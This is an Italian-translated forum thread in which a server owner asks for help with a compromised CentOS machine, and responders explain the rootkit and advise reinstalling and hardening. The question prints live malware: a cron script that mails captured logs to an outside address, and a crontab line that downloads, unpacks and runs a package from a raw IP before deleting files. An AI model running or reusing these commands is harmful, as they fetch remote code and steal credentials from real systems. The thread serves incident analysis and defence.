Hai bisogno di consigli sul server Linux che viene violato

4

Attualmente sto cercando di scoprire come uno dei nostri centos server è stato compromesso. Abbiamo riscontrato malware sui nostri siti. Dopo la ricerca ho finalmente trovato il malware iniettare nei siti. Come stava accadendo a caso, era difficile da rilevare. Ho seguito l'aiuto di questo articolo del blog:

link

Questo mi ha portato a cercare tra tutti i moduli Apache e alla fine ho trovato un modulo che stava iniettando il malware. Andava sotto il nome di mod_string_mime.so e veniva caricato tramite /etc/httpd/conf.d/mailman.conf per evitare il rilevamento. Molto frustrante. Quindi, il modulo è stato cancellato e il file mailman.conf è tornato alla normalità.

Scavando ulteriormente, ho installato ed eseguito rkhunter. Dopo aver eseguito ciò, ho trovato un avviso per un file sospetto in /etc/cron.daily/ chiamato dnsquery. In questo file, questo è quello che sembra ...

#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail [email protected] -s "$(hostname -f)" < test
mail [email protected] -s "$(hostname -f)" < test
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A

Ho provato a eliminare questo file ma continua a tornare ogni minuto. Il proprietario e il gruppo sono "psaadm". Non riesco a trovare come viene creato. Presumo che stia generando attraverso plesk cron o qualcosa del genere.

L'ho trovato anche in crontab:

*   *   *   *   *   chattr -AacDdijsSu /bin/; cd /root ; wget http://77.241.87.75/xpsa/skdet.tgz; chmod +x skdet.tgz; tar zxvf skdet.tgz ; cd skdet ; ./inst; rm -rf /usr/share/misc /root/sk* /tmp/nc* /root/ssh/;

che non sembra giusto.

Qualche suggerimento su come procedere o individuare l'intrusione?

    
posta davidbehan 16.02.2013 - 23:14
fonte

2 risposte

6

Prima di tutto. Il tuo computer è stato compromesso e sono state installate diverse cose per mantenerlo compromesso. Questo non può essere salvato; la macchina deve essere pulita con il fuoco. Non sarai in grado di evitare un formato completo e amp; reinstallare. Il tuo sistema è morto; versare una lacrima su di esso, quindi andare avanti.

Ora stiamo parlando solo dell'analisi post-mortem. Il crontab scarica visibilmente ogni minuto un pacchetto (il file "skdet.tgz") che non è quindi compresso e lanciato, e fa alcune ... cose interessanti. Ad esempio, automaticamente saccheggia e invia via e-mail il tuo file /etc/shadow . Puoi scaricare il file su un'altra macchina, decomprimerlo e ispezionarne il contenuto (non non lanciare alcun file!); è istruttivo.

Il pacchetto contiene un "messaggio" in cui l'autore del rootkit afferma che non ha infranto nulla e che potrebbe essere d'aiuto nella rimozione del rootkit se contattato, sebbene non parli di alcuna condizione. Questa potrebbe essere un'autentica esperienza scientifica che è sfuggita di mano; questo potrebbe anche essere un caso più banale di riscatto.

    
risposta data 16.02.2013 - 23:35
fonte
4

Bene, c'è solo una cosa che puoi fare:

Oralacosamiglioreèfareriferimentoallostubsuquestoargomento serverfault .

Se stai utilizzando il tuo server web per l'hosting di diversi siti web, la cosa migliore che puoi fare è assicurarti che ogni sito abbia un suo utente che è in prigione. Ciò ridurrà il rischio di compromettere il sistema. (Potrebbero esserci ancora file binari vulnerabili che potrebbero portare all'escalation dei privilegi, quindi è necessario assicurarsi di applicare la patch alla macchina al più presto quando le patch di sicurezza escono). Ad esempio suphp è creato appositamente per questo scopo ed esegue il codice sotto il suo proprietario e non sotto l'utente che il tuo server web è in esecuzione.

Inoltre, vi consiglio di rafforzare la vostra macchina usando i firewall di applicazioni Web e i sistemi di rilevamento delle intrusioni di host. Ciò ridurrà la quantità di possibili attacchi. (Ciò richiede qualche ritocco in quanto potrebbe interferire con i servizi)

    
risposta data 16.02.2013 - 23:49
fonte

Leggi altre domande sui tag